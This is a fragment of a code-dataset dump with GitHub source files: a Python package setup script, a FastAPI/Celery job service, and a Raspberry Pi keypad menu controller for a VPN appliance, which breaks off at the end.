"41", "api": [{"api_name": "pydantic.BaseModel", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 28, "usage_type": "name"}, {"api_name": "pydantic.StrictStr", "line_number": 28, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 28, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "pydantic.conlist", "line_number": 29, "usage_type": "call"}, {"api_name": "pydantic.StrictStr", "line_number": 29, "usage_type": "argument"}, {"api_name": "pydantic.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 30, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 31, "usage_type": "name"}, {"api_name": "pydantic.StrictInt", "line_number": 31, "usage_type": "name"}, {"api_name": "pydantic.Field", "line_number": 31, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 32, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 32, "usage_type": "name"}, {"api_name": "pprint.pformat", "line_number": 42, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "13682236819", "text": "# setup.py\n\nfrom setuptools import setup\n\n\nPACKAGE = \"pygmnormalize\"\nNAME = \"pygmnormalize\"\nDESCRIPTION = \"Package with methods for normalization matrices of genes expression.\"\nAUTHOR = \"Grigory Feoktistov\"\nAUTHOR_EMAIL = \"ficusss.developer@gmail.com\"\nURL = \"https://github.com/ficusss/PyGMNormalize\"\nVERSION = __import__(PACKAGE).__version__\n\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n license=\"MIT\",\n url=URL,\n packages=[PACKAGE],\n install_requires=[\n 'numpy',\n 'scipy',\n ],\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n ],\n zip_safe=False,\n)\n", "repo_name": "ficusss/PyGMNormalize", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "41", "api": [{"api_name": "setuptools.setup", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "26500501078", "text": "import os\nfrom dotenv import load_dotenv\n\nfrom fastapi import FastAPI, Depends, HTTPException\nfrom fastapi.responses import JSONResponse\nfrom pydantic import BaseModel\nfrom sqlalchemy.orm import Session\n\nfrom celery import Celery\nfrom celery.execute import send_task\n\nimport crud\nfrom database import get_session\nimport task_mapper\n\nimport logger\n\nload_dotenv()\n\nPOSTGRES_URL = os.getenv(\"POSTGRES_CONNECTION_URL\")\nBROKER_URL = os.getenv(\"BROKER_URL\")\n\nclass JobRequest(BaseModel):\n payer: str\n transformation: int\n transformation_number: int\n image_url: str\n image_name: str\n block_hash: str\n transaction_hash: str\n\ncelery_app = Celery(\"tasks\", backend=POSTGRES_URL, broker=BROKER_URL)\n\napp = FastAPI()\n\n@app.post(\"/generate\")\nasync def generate(request: JobRequest, session: Session = Depends(get_session)):\n logger.log_job_request(request.payer,\n request.transformation,\n request.transformation_number,\n request.image_name,\n request.image_url)\n\n try:\n task_name = task_mapper.task_name(request.transformation)\n transformation_name = task_mapper.transformation_name(request.transformation)\n except KeyError:\n raise HTTPException(status_code=400, detail=\"Transformation not supported\")\n\n job_request = crud.create_job_request(session, request)\n\n task = celery_app.send_task(task_name,\n [transformation_name,\n request.transformation_number,\n request.payer,\n request.image_url,\n request.image_name])\n logger.log_job_started(task.id)\n\n job_request = crud.add_task_to_job_request(session, job_request, task.id)\n\n return JSONResponse({\"task_id\": task.id})\n", "repo_name": "omniversescience/anaai", "sub_path": "job-service/service.py", "file_name": "service.py", "file_ext": "py", "file_size_in_byte": 1821, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "41", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 18, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 20, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 21, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 23, "usage_type": "name"}, {"api_name": "celery.Celery", "line_number": 32, "usage_type": "call"}, {"api_name": "fastapi.FastAPI", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 37, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 37, "usage_type": "call"}, {"api_name": "database.get_session", "line_number": 37, "usage_type": "argument"}, {"api_name": "logger.log_job_request", "line_number": 38, "usage_type": "call"}, {"api_name": "task_mapper.task_name", "line_number": 45, "usage_type": "call"}, {"api_name": "task_mapper.transformation_name", "line_number": 46, "usage_type": "call"}, {"api_name": "fastapi.HTTPException", "line_number": 48, "usage_type": "call"}, {"api_name": "crud.create_job_request", "line_number": 50, "usage_type": "call"}, {"api_name": "logger.log_job_started", "line_number": 58, "usage_type": "call"}, {"api_name": "crud.add_task_to_job_request", "line_number": 60, "usage_type": "call"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "21275286280", "text": "import RPi.GPIO as GPIO\nfrom adafruit_bus_device import i2c_device\nimport adafruit_aw9523\nfrom PIL import Image, ImageDraw, ImageFont\nimport logging\nimport board\nimport math\nimport time\nimport signal\nimport os\nimport sys\nup_dir = os.path.dirname(os.path.abspath(__file__)) + '/../'\nsys.path.append(up_dir)\n# above line is needed for following classes:\nfrom led_client import LEDClient # noqa E402 need up_dir first\nfrom heartbeat import HeartBeat # noqa E402 need up_dir first\nfrom device import Device # noqa E402 need up_dir first\nfrom diag import WPDiag # noqa E402 need up_dir first\nfrom lcd import LCD as LCD # noqa E402 need up_dir first\nimport constants as consts # noqa E402 need up_dir first\n\ntry:\n from self.configparser import configparser\nexcept ImportError:\n import configparser\ndisplay = True\n\n\nDIR = '/usr/local/pproxy/ui/'\nCONFIG_FILE = '/etc/pproxy/config.ini'\nSTATUS_FILE = '/var/local/pproxy/status.ini'\nLOG_CONFIG = \"/etc/pproxy/logging.ini\"\nlogging.config.fileConfig(LOG_CONFIG,\n disable_existing_loggers=False)\nINT_EXPANDER = 5\nBUTTONS = [\"0\", \"1\", \"2\", \"up\", \"down\", \"back\", \"home\"]\n\n# Unit of time: how often it wakes from sleep\n# in seconds\nUNIT_TIMEOUT = 30\n# Multiply by unit above for all below timeouts\nNRML_SCREEN_TIMEOUT = 40\n# if an error is detected, keep screen\n# on longer\nERR_SCREEN_TIMEOUT = 100\nMENU_TIMEOUT = 10\n\n\nclass KEYPAD:\n\n def __init__(self, menu_items=None):\n self.config = configparser.ConfigParser()\n self.config.read(CONFIG_FILE)\n self.status = configparser.ConfigParser()\n self.status.read(STATUS_FILE)\n self.logger = logging.getLogger(\"keypad\")\n self.device = Device(self.logger)\n self.display_active = False\n self.window_stack = []\n self.led_enabled = True\n self.led_client = LEDClient()\n if (int(self.config.get('hw', 'button-version'))) == 1:\n # this is an old model, no need for the keypad service\n print(\"old keypad\")\n self.enabled = False\n return\n else:\n print(\"new keypad\")\n self.aw = None\n self.init_i2c()\n self.enabled = True\n self.diag_shown = False\n self.lcd = LCD()\n self.lcd.set_lcd_present(self.config.get('hw', 'lcd'))\n self.lcd.display([(1, \"WEPN loading ... \", 0, \"white\"), ], 15)\n self.chin = {\"text\": \"\", \"color\": (0, 0, 0), \"opacity\": 100, \"errs\": [False] * 7}\n self.width = 240\n self.height = 240\n self.menu_row_y_size = 37\n self.menu_row_skip = 22\n self.menu = None\n self.menu_index = 0\n self.led_setting_index = 0\n self.current_title = \"Main\"\n self.menu_active_countdown = MENU_TIMEOUT\n self.countdown_to_turn_off_screen = NRML_SCREEN_TIMEOUT\n self.screen_timed_out = False\n self.leds_turned_for_error = False\n self.diag_code = 0\n self.prev_diag_code = 0\n self.err_pending_ack = False\n self.dev_remaining = 7\n self.channel = \"prod\"\n\n def init_i2c(self):\n GPIO.setmode(GPIO.BCM)\n i2c = board.I2C()\n # Set this to the GPIO of the interrupt:\n GPIO.setup(INT_EXPANDER, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n try:\n self.aw = adafruit_aw9523.AW9523(i2c, 0x58)\n new_i2c = i2c_device.I2CDevice(i2c, 0x58)\n except:\n try:\n self.aw = adafruit_aw9523.AW9523(i2c, 0x5b)\n new_i2c = i2c_device.I2CDevice(i2c, 0x5b)\n except:\n self.aw = adafruit_aw9523.AW9523(i2c, 0x5a)\n new_i2c = i2c_device.I2CDevice(i2c, 0x5a)\n self.aw.reset()\n # print(\"Inputs: {:016b}\".format(self.aw.inputs))\n self.aw.directions = 0xff00\n # self.aw.outputs = 0x0000\n time.sleep(1)\n # first write to both registers to reset the interrupt flag\n buffer = bytearray(2)\n buffer[0] = 0x00\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n time.sleep(0.1)\n buffer[0] = 0x01\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n # disable interrupt for higher bits\n buffer[0] = 0x06\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n buffer[0] = 0x07\n buffer[1] = 0xff\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n # read registers again to reset interrupt\n buffer[0] = 0x00\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n time.sleep(0.1)\n buffer[0] = 0x01\n buffer[1] = 0x00\n new_i2c.write(buffer)\n new_i2c.write_then_readinto(buffer, buffer, out_end=1, in_start=1)\n time.sleep(0.1)\n # _inputs = self.aw.inputs\n # for i in range(1):\n # print(\"Inputs: {:016b}\".format(self.aw.inputs))\n # time.sleep(0.5)\n time.sleep(0.5)\n GPIO.add_event_detect(INT_EXPANDER, GPIO.FALLING, callback=self.key_press_cb)\n\n def key_press_cb(self, channel):\n inputs = self.aw.inputs\n # print(\"Inputs: {:016b}\".format(inputs))\n inputs = 127 - inputs & 0x7F\n if inputs < 1:\n return\n index = (int)(math.log2(inputs))\n exit_menu = False\n menu_base_index = 0\n window_size = len(self.window_stack)\n self.err_pending_ack = False\n if inputs > -1:\n # first set countdown for menu being active to 10\n # this ensures while menu is actively used\n # it is not overwritten\n self.menu_active_countdown = MENU_TIMEOUT\n # This below countdown will turn off screen if not used\n # every time keys are touched, the countdown will be reset\n self.countdown_to_turn_off_screen = NRML_SCREEN_TIMEOUT\n # if screen has timed out, first button press should ONLY\n # render the screen and nothing else\n if self.screen_timed_out is True:\n self.screen_timed_out = False\n # just show whatever the last menu was on screen\n self.render()\n return\n\n if BUTTONS[index] == \"up\":\n print(\"Key up on \" + str(index))\n if BUTTONS[index] == \"down\":\n print(\"Key down on \" + str(index))\n if BUTTONS[index] == \"back\":\n print(\"Key back on \" + str(index))\n if window_size > 0:\n back = self.window_stack.pop()\n self.menu_index = back\n self.render()\n elif window_size == 0:\n self.set_current_menu(0)\n exit_menu = True\n self.show_home_screen()\n if BUTTONS[index] in [\"1\", \"2\", \"0\"]:\n if window_size == 0 or (self.menu_index != self.window_stack[window_size - 1]):\n self.window_stack.append(self.menu_index)\n exit_menu = self.menu[self.menu_index][int(\n BUTTONS[index]) + menu_base_index][\"action\"]()\n if self.diag_shown is True:\n self.diag_shown = False\n if BUTTONS[index] == \"home\":\n print(\"Key home on \" + str(index))\n self.window_stack.clear()\n exit_menu = True\n self.show_home_screen()\n if exit_menu is False:\n self.render()\n\n def clear_screen(self):\n self.lcd.clear()\n\n def set_full_menu(self, menu, titles):\n self.menu = menu\n self.titles = titles\n\n def set_current_menu(self, index):\n self.menu_index = index\n\n def round_corner(self, radius, fill):\n \"\"\"Draw a round corner\"\"\"\n corner = Image.new('RGB', (radius, radius), (0, 0, 0, 0))\n draw = ImageDraw.Draw(corner)\n draw.pieslice((0, 0, radius * 2, radius * 2), 180, 270, fill=fill)\n return corner\n\n def round_rectangle(self, size, radius, fill):\n \"\"\"Draw a rounded rectangle\"\"\"\n width, height = size\n rectangle = Image.new('RGB', size, fill)\n corner = self.round_corner(radius, fill)\n rectangle.paste(corner, (0, 0))\n rectangle.paste(corner.rotate(90), (0, height - radius)) # Rotate the corner and paste it\n rectangle.paste(corner.rotate(180), (width - radius, height - radius))\n rectangle.paste(corner.rotate(270), (width - radius, 0))\n return rectangle\n\n def half_round_rectangle(self, size, radius, fill):\n \"\"\"Draw a rounded rectangle\"\"\"\n width, height = size\n rectangle = Image.new('RGB', size, fill)\n corner = self.round_corner(radius, fill)\n # rectangle.paste(corner, (0, 0))\n # rectangle.paste(corner.rotate(90), (0, height - radius)) # Rotate the corner and paste it\n rectangle.paste(corner.rotate(180), (width - radius, height - radius))\n rectangle.paste(corner.rotate(270), (width - radius, 0))\n return rectangle\n\n def render(self, title=None):\n # get a font\n base = Image.new(\"RGBA\", (self.width, self.height), (0, 0, 0))\n fnt = ImageFont.truetype(DIR + 'rubik/Rubik-Light.ttf', 30)\n # fnt_title = ImageFont.truetype(DIR + 'rubik/Rubik-Light.ttf', 8)\n txt = Image.new(\"RGBA\", base.size, (255, 255, 255, 0))\n d = ImageDraw.Draw(txt)\n overlay = Image.new(\"RGBA\", base.size, (255, 255, 255, 0))\n if (title is None):\n title = self.titles[self.menu_index][\"text\"]\n if \"color\" in self.titles[self.menu_index]:\n color = self.titles[self.menu_index][\"color\"]\n else:\n color = (255, 255, 255)\n d.text(((200 - len(title) * 8) / 2, 2), title, font=fnt,\n fill=(color[0], color[1], color[2], 255))\n x = 10\n y = 0\n i = 0\n corner = None\n for item in self.menu[self.menu_index]:\n if \"display\" in item and item[\"display\"] is False:\n skip = True\n else:\n skip = False\n\n if \"color\" in item:\n color = item[\"color\"]\n else:\n color = (255, 255, 255)\n\n y = y + int(self.menu_row_y_size / 2) + self.menu_row_skip\n opacity = 128\n if not skip:\n opacity = 255\n corner = self.half_round_rectangle((200, self.menu_row_y_size), int(self.menu_row_y_size / 2),\n (255, 255, 255, 128))\n corner.putalpha(18)\n cornery = y\n overlay.paste(corner, (x, cornery))\n if not skip:\n d.text((x, y), \" \" + item['text'], font=fnt,\n fill=(color[0], color[1], color[2], opacity))\n i = i + 1\n y = y + int(self.menu_row_y_size / 2)\n if self.menu_index == 5:\n # show a chin line for Home\n font_icon = ImageFont.truetype('/usr/local/pproxy/ui/heydings_icons.ttf', 25)\n y = y + int(self.menu_row_y_size / 2) + 6\n x = 20\n i = 0\n for c in self.chin['text']:\n if self.chin['errs'][i]:\n if i == 5:\n # for self-test, just show orange not red\n # self test is sadly unreliable\n # TODO: remove this once self test is reliable\n color = (255, 105, 0)\n else:\n color = (255, 0, 0)\n else:\n color = (0, 255, 0)\n i += 1\n d.text((x, y), c, font=font_icon,\n fill=(color[0],\n color[1],\n color[2],\n self.chin[\"opacity\"]))\n x += 30\n out = Image.alpha_composite(base, txt)\n out.paste(overlay, (0, 0), overlay)\n out = out.rotate(0)\n self.lcd.show_image(out)\n\n def show_claim_info(self):\n self.config.read(CONFIG_FILE)\n self.status.read(STATUS_FILE)\n current_key = self.status.get('status', 'temporary_key')\n serial_number = self.config.get('django', 'serial_number')\n display_str = [(1, \"Device Key:\", 0, \"blue\"), (2, str(current_key), 0, \"white\"),\n (3, \"Serial #\", 0, \"blue\"), (4, serial_number, 0, \"white\"), ]\n self.lcd.display(display_str, 20)\n # self.render()\n return True # exit the menu\n\n def show_claim_info_qrcode(self):\n current_key = self.status.get('status', 'temporary_key')\n serial_number = self.config.get('django', 'serial_number')\n display_str = [(1, \"https://red.we-pn.com/?pk=NONE&s=\" +\n str(serial_number) + \"&k=\" + str(current_key), 2, \"white\"), ]\n self.lcd.display(display_str, 20)\n return True # exit the menu\n\n def restart(self):\n self.lcd.set_logo_text(\"Restarting ...\")\n self.lcd.show_logo()\n self.device.reboot()\n return True # exit the menu\n\n def power_off(self):\n self.lcd.set_logo_text(\"Powering off ...\")\n self.lcd.show_logo()\n self.device.turn_off()\n return True # exit the menu\n\n def run_diagnostics(self):\n diag = WPDiag(self.logger)\n display_str = \"Starting Diagnostics, please wait.\"\n self.lcd.long_text(display_str, \"i\", \"green\")\n test_port = int(self.config.get('openvpn', 'port')) + 1\n self.diag_code = diag.get_error_code(test_port)\n serial_number = self.config.get('django', 'serial_number')\n time.sleep(3)\n display_str = [(1, \"Status Code\", 0, \"blue\"), (2, str(self.diag_code), 0, \"white\"),\n (3, \"Serial #\", 0, \"blue\"), (4, serial_number, 0, \"white\"),\n (5, \"Local IP\", 0, \"blue\"), (6, self.device.get_local_ip(), 0, \"white\"),\n (7, \"MAC Address\", 0, \"blue\"), (8, self.device.get_local_mac(), 0, \"white\"), ]\n self.lcd.display(display_str, 20)\n self.logger.debug(display_str)\n return True # stay in the menu\n\n def show_diag_qr_code(self):\n if not hasattr(self, \"diag_code\"):\n self.run_diagnostics()\n display_str = [(2, \"wepn://diag=\" + str(self.diag_code), 2, \"white\"), ]\n self.lcd.display(display_str, 19)\n self.diag_shown = True\n return True # stay in the menu\n\n def signal_main_wepn(self):\n with open(\"/var/run/pproxy.pid\", \"r\") as f:\n wepn_pid = int(f.readline())\n self.logger.debug(\"Signaling main process at: \" + str(wepn_pid))\n print(\"Signaling main process at: \" + str(wepn_pid))\n try:\n os.kill(wepn_pid, signal.SIGUSR1)\n except ProcessLookupError as process_error:\n self.logger.error(\"Could not find the process for main wepn: \" +\n str(wepn_pid) + \":\" + str(process_error))\n\n def show_dummy_home(self, new_title, new_str):\n new_menu_location = len(self.menu)\n self.titles.insert(new_menu_location, {\"text\": new_title})\n self.lcd.display(new_str, 20)\n\n def append_current_title(self, new_str):\n _title = self.titles[self.menu_index][\"text\"] + new_str\n self.render(title=_title)\n\n def refresh_status(self, led_update=True):\n self.status.read(STATUS_FILE)\n diag_code = self.status.get(\"status\", \"last_diag_code\")\n if diag_code != \"\":\n self.prev_diag_code = self.diag_code\n self.diag_code = int(diag_code)\n if led_update:\n if self.diag_code != consts.HEALTHY_DIAG_CODE:\n if self.prev_diag_code == consts.HEALTHY_DIAG_CODE:\n # new error just detected\n # we need to show red pulse until user interacts with device\n self.err_pending_ack = True\n if self.err_pending_ack:\n # only pulse if no user interaction recorded since error was detected first\n self.led_client.pulse(color=(255, 0, 0), wait=100, repetitions=1)\n self.leds_turned_for_error = True\n else:\n if self.leds_turned_for_error:\n # turns off LEDS only if it set them previously\n # ideally, this will be a central place in led_manager\n # so one process cannot clear another ones\n # TODO(amir): updated to new patterns\n self.leds_turned_for_error = False\n self.led_client.blank()\n\n def show_home_screen(self):\n self.display_active = True\n self.status = configparser.ConfigParser()\n self.status.read(STATUS_FILE)\n state = self.status.get(\"status\", \"state\")\n if int(self.status.get(\"status\", \"claimed\")) == 0:\n if self.device.needs_package_update():\n # Disable showing QR Code when software needs upgrade\n # This way the update screen will not be covered\n # Other menus work though.\n # TODO: We need a proper WindowManager\n return\n self.show_claim_info_qrcode()\n else:\n # show the status info\n self.set_current_menu(5)\n self.titles[5][\"color\"] = (255, 255, 255)\n self.refresh_status(led_update=True)\n self.menu[5][0][\"display\"] = False\n self.menu[5][1][\"display\"] = False\n self.menu[5][2][\"text\"] = \"Menu\"\n self.menu[5][2][\"action\"] = self.show_main_menu\n self.menu[5][2][\"display\"] = True\n # TODO: self test is unreliable, so ignore bit 2\n if (self.diag_code | 32) != consts.HEALTHY_DIAG_CODE:\n if self.prev_diag_code == consts.HEALTHY_DIAG_CODE \\\n or self.prev_diag_code == 0:\n # first time after diag says there's an error\n # wake up the screen, and reset the count down\n self.screen_timed_out = False\n # keep screen on longer\n self.countdown_to_turn_off_screen = ERR_SCREEN_TIMEOUT\n color = (255, 0, 0)\n title = \"Error\"\n self.menu[5][1][\"text\"] = \"Help\"\n self.menu[5][1][\"action\"] = self.show_summary\n self.menu[5][1][\"display\"] = True\n else:\n if self.countdown_to_turn_off_screen > NRML_SCREEN_TIMEOUT:\n self.countdown_to_turn_off_screen = NRML_SCREEN_TIMEOUT\n color = (0, 255, 0)\n title = \"OK\"\n\n self.set_current_menu(5)\n self.titles[5][\"color\"] = color\n self.titles[5][\"text\"] = title\n icons, any_err, errs = self.lcd.get_status_icons_v2(state, self.diag_code)\n self.chin[\"text\"] = icons\n self.chin[\"errs\"] = errs\n self.chin[\"color\"] = color\n self.chin[\"opacity\"] = 255\n if self.screen_timed_out is False:\n self.render()\n\n def show_main_menu(self):\n self.display_active = True\n self.set_current_menu(0)\n self.render()\n\n def show_summary(self):\n self.display_active = True\n new_menu_location = len(self.menu)\n self.titles.insert(new_menu_location, {\"text\": \"Summary\"})\n self.status = configparser.ConfigParser()\n self.status.read(STATUS_FILE)\n state = self.status.get(\"status\", \"state\")\n icons, any_err, errs = self.lcd.get_status_icons_v2(state, self.diag_code)\n txts = [\n [\"Network up\", \"Internet up\", \"Services up\",\n \"Reachable\", \"Linked\", \"Self-tests pass\", \"Claimed\"],\n [\"Network down\", \"Internet down\", \"Services down\", \"Not reachable\", \"Not linked\", \"Self-tests fail\", \"Not claimed\"]]\n lines = []\n t = 1\n for i in range(len(icons)):\n if errs[i]:\n icon_color = \"red\"\n txt_color = \"red\"\n t = 1\n else:\n icon_color = \"green\"\n txt_color = \"white\"\n t = 0\n lines.append((txts[t][i], icons[i], txt_color, icon_color))\n self.lcd.show_summary(lines, 28)\n # stay in the menu\n return True\n\n def show_power_menu(self):\n self.display_active = True\n self.current_title = \"Power\"\n self.set_current_menu(1)\n self.render()\n\n def show_settings_menu(self):\n self.display_active = True\n self.current_title = \"Settings\"\n self.set_current_menu(3)\n self.render()\n\n def show_config_menu(self):\n self.display_active = True\n self.current_title = \"Access\"\n self.set_current_menu(6)\n self.render()\n\n def show_about_menu(self):\n self.display_active = True\n self.current_title = \"About\"\n self.set_current_menu(2)\n self.render()\n\n def toggle_led_setting(self):\n self.display_active = True\n options = [\"Yellow\", \"White\", \"Red\", \"Green\", \"Brown\", \"Rainbow\", \"Reset\", \"Off\"]\n\n new_index = (self.led_setting_index + 1) % len(options)\n if new_index < 5:\n # static on with colors\n self.led_enabled = True\n self.led_client.set_enabled(self.led_enabled)\n if new_index == 0:\n # yellow\n self.led_client.set_all(color=(255, 255, 0))\n elif new_index == 1:\n # white\n self.led_client.set_all(color=(255, 255, 255))\n elif new_index == 2:\n # red\n self.led_client.set_all(color=(255, 0, 0))\n elif new_index == 3:\n # green\n self.led_client.set_all(color=(0, 255, 0))\n elif new_index == 4:\n # brown\n self.led_client.set_all(color=(165, 42, 42))\n elif new_index == 5:\n # rainbow\n self.led_enabled = True\n self.led_client.set_enabled(self.led_enabled)\n self.led_client.rainbow(rounds=5, wait=50) # 100ms wait\n elif new_index == 6:\n # reset\n self.led_enabled = True\n self.led_client.set_enabled(self.led_enabled)\n self.led_client.blank()\n elif new_index == 7:\n # completely off\n self.led_client.blank()\n self.led_enabled = False\n self.led_client.set_enabled(self.led_enabled)\n\n # self.led_enabled = not self.led_enabled\n # self.led_client.set_enabled(self.led_enabled)\n # self.led_client.set_all(255,255,0)\n # s = \"OFF\"\n # if self.led_enabled:\n # s= \"ON\"\n self.menu[3][0][\"text\"] = \"Ring: \" + options[new_index]\n self.led_setting_index = new_index\n self.render()\n\n def channel_update(self):\n print(\"channel_update:\" + str(self.dev_remaining) + \" channel: \" + self.channel)\n if self.channel == \"prod\":\n if self.dev_remaining == 0:\n # 7 clicks done already, switch\n self.channel = \"dev\"\n self.chin = {\"text\": \"Development\", \"color\": (\n 255, 255, 255), \"opacity\": 50, \"errs\": [False] * 7}\n self.show_software_version()\n else:\n self.dev_remaining -= 1\n else:\n if self.dev_remaining == 7:\n self.channel = \"prod\"\n self.chin = {\"text\": \"Production\", \"color\": (\n 255, 255, 255), \"opacity\": 50, \"errs\": [False] * 7}\n self.show_software_version()\n else:\n self.dev_remaining += 1\n self.render()\n\n def show_software_version(self):\n print(\"show_software_version\")\n self.display_active = True\n self.set_current_menu(4)\n # ONLY FOR UX DEVELOPMENT, show the git hash\n import subprocess # nosec: dev only, static command = no injection\n label = \"production\"\n if self.channel == \"dev\":\n git_cmd = \"git log -1 --format=format:\\\"%H\\\"\"\n try:\n label = subprocess.check_output( # nosec: static command, go.we-pn.com/waiver-1\n git_cmd.split()).strip()\n label = label.decode(\"utf-8\")[1:8]\n except subprocess.CalledProcessError:\n # self.logger.error(e.output)\n label = \"no git hash\"\n else:\n label = self.device.get_installed_package_version()\n self.menu[4][0][\"text\"] = label\n self.menu[4][0][\"action\"] = self.channel_update\n self.render()\n\n def update_software(self):\n self.display_active = True\n self.menu[4][1][\"text\"] = \"checking ...\"\n self.render()\n if self.channel == \"prod\":\n self.device.software_update_blocking(self.lcd, self.led_client)\n else:\n self.device.software_update_from_git()\n self.menu[4][1][\"text\"] = \"Update\"\n self.show_software_version()\n\n def generate_config(self):\n self.display_active = True\n # this should only run if device has not real config\n # while initial provisioning is happening\n self.device.generate_new_config()\n self.config.read(CONFIG_FILE)\n self.render()\n self.show_claim_info()\n\n def toggle_ssh_server(self):\n self.lcd.long_text(\"Working on SSH\")\n ssh_server = \"ON\"\n if self.device.is_service_active(b'ssh.service'):\n ssh_server = \"OFF\"\n self.menu[6][1][\"text\"] = \"SSH: \" + ssh_server\n self.device.generate_ssh_host_keys()\n self.device.set_sshd_service(not\n self.device.is_service_active(b'ssh.service'))\n self.render()\n\n def toggle_remote_ssh_session(self):\n self.lcd.long_text(\"Working on Remote SSH\")\n if not self.device.is_remote_session_running():\n # if session is not running, start\n if not self.device.is_service_active(b'ssh.service'):\n # if local ssh server is off, first turn it on\n self.menu[6][1][\"text\"] = \"SSH: ON\"\n self.menu[6][2][\"text\"] = \"Remote: ON\"\n self.device.generate_ssh_host_keys()\n self.device.set_sshd_service(True)\n # ssh to the remote server, open local port\n # note: the remote server is exclusively for this\n # connect to relay.we-pn.com\n self.device.set_remote_ssh_session(enabled=True)\n else:\n # Provider might have enabled SSH server before\n # To be safe we will turn that off too, worst case they\n # will need to enable manually again.\n self.menu[6][1][\"text\"] = \"SSH: OFF\"\n self.menu[6][2][\"text\"] = \"Remote: OFF\"\n self.device.set_sshd_service(False)\n # Disabling SSH serve would NOT terminate session too\n self.device.set_remote_ssh_session(enabled=False)\n\n self.render()\n\n\ndef main():\n keypad = KEYPAD()\n if keypad.enabled is False:\n return\n s = \"OFF\"\n if keypad.led_enabled:\n s = \"ON\"\n\n items = [\n [{\"text\": \"Settings\", \"action\": keypad.show_settings_menu},\n {\"text\": \"Power\", \"action\": keypad.show_power_menu},\n {\"text\": \"About\", \"action\": keypad.show_about_menu}, ],\n [{\"text\": \"Restart\", \"action\": keypad.restart},\n {\"text\": \"Power off\", \"action\": keypad.power_off}, ],\n [{\"text\": \"Diagnostics\", \"action\": keypad.run_diagnostics},\n {\"text\": \"Software\", \"action\": keypad.show_software_version}],\n [{\"text\": \"LED ring: \" + s, \"action\": keypad.toggle_led_setting},\n {\"text\": \"Access\", \"action\": keypad.show_config_menu}, ],\n [{\"text\": \"Getting version ... \" + s, \"action\": keypad.show_software_version},\n {\"text\": \"Update\", \"action\": keypad.update_software}, ],\n [{\"text\": \"\", \"display\": False, \"action\": 0},\n {\"text\": \"Help\", \"display\": False, \"action\": keypad.show_summary},\n {\"text\": \"Menu\", \"action\": keypad.show_home_screen}],\n [{\"text\": \"\", \"display\": False, \"action\": 0},\n {\"text\": \"\", \"display\": False, \"action\": 0},\n {\"text\": \"\", \"display\": False, \"action\": 0},\n ],\n ]\n titles = [{\"text\": \"Main\"}, {\"text\": \"Power\"}, {\"text\": \"About\"}, {\"text\": \"Settings\"},\n {\"text\": \"Software\"}, {\"text\": \"Home\", \"color\": (255, 255, 255)}, {\"text\": \"Access\", \"color\": (255, 0, 0)}]\n\n if 0 == int(keypad.status.get('status', 'claimed')):\n items[2].insert(0, {\"text\": \"Claim Info\", \"action\": keypad.show_claim_info})\n if keypad.config.get('django', 'serial_number') == \"CHANGE_SERIALNUM\":\n items[6].insert(0, {\"text\": \"Generate\", \"display\": True, \"action\": keypad.generate_config})\n if True:\n ssh_server = \"OFF\"\n if keypad.device.is_service_active(b'ssh.service'):\n ssh_server = \"ON\"\n items[6].insert(1, {\"text\": \"SSH: \" + ssh_server, display: True,\n \"action\": keypad.toggle_ssh_server})\n if True:\n remote = \"OFF\"\n if keypad.device.is_remote_session_running():\n remote = \"ON\"\n items[6].insert(2, {\"text\": \"Remote: \" + remote, display: True,\n \"action\": keypad.toggle_remote_ssh_session})\n\n keypad.set_full_menu(items, titles)\n keypad.set_current_menu(5)\n # default screen is QR Code\n keypad.show_home_screen()\n\n ############################\n # This is an example of how screen can show a custom message\n # This is to be used for getting messages from another process (socket?)\n # Advantage of showing the messager from here is that the error message\n # will stay on (and not be overwritten by screen refreshes) until user\n # manually dismisses them\n # display_str = [(1, \"Status Code\", 0, \"blue\"), (2, \"123\", 0, \"white\"),\n # (3, \"Serial #\", 0, \"blue\"), (4, \"123\", 0, \"white\"),\n # (5, \"Local IP\", 0, \"blue\"), (6, \"123\", 0, \"white\"),\n # (7, \"MAC Address\", 0, \"blue\"), (8, \"123\", 0, \"white\"), ]\n # keypad.show_dummy_home(\"HOORA\", display_str)\n while True:\n # this 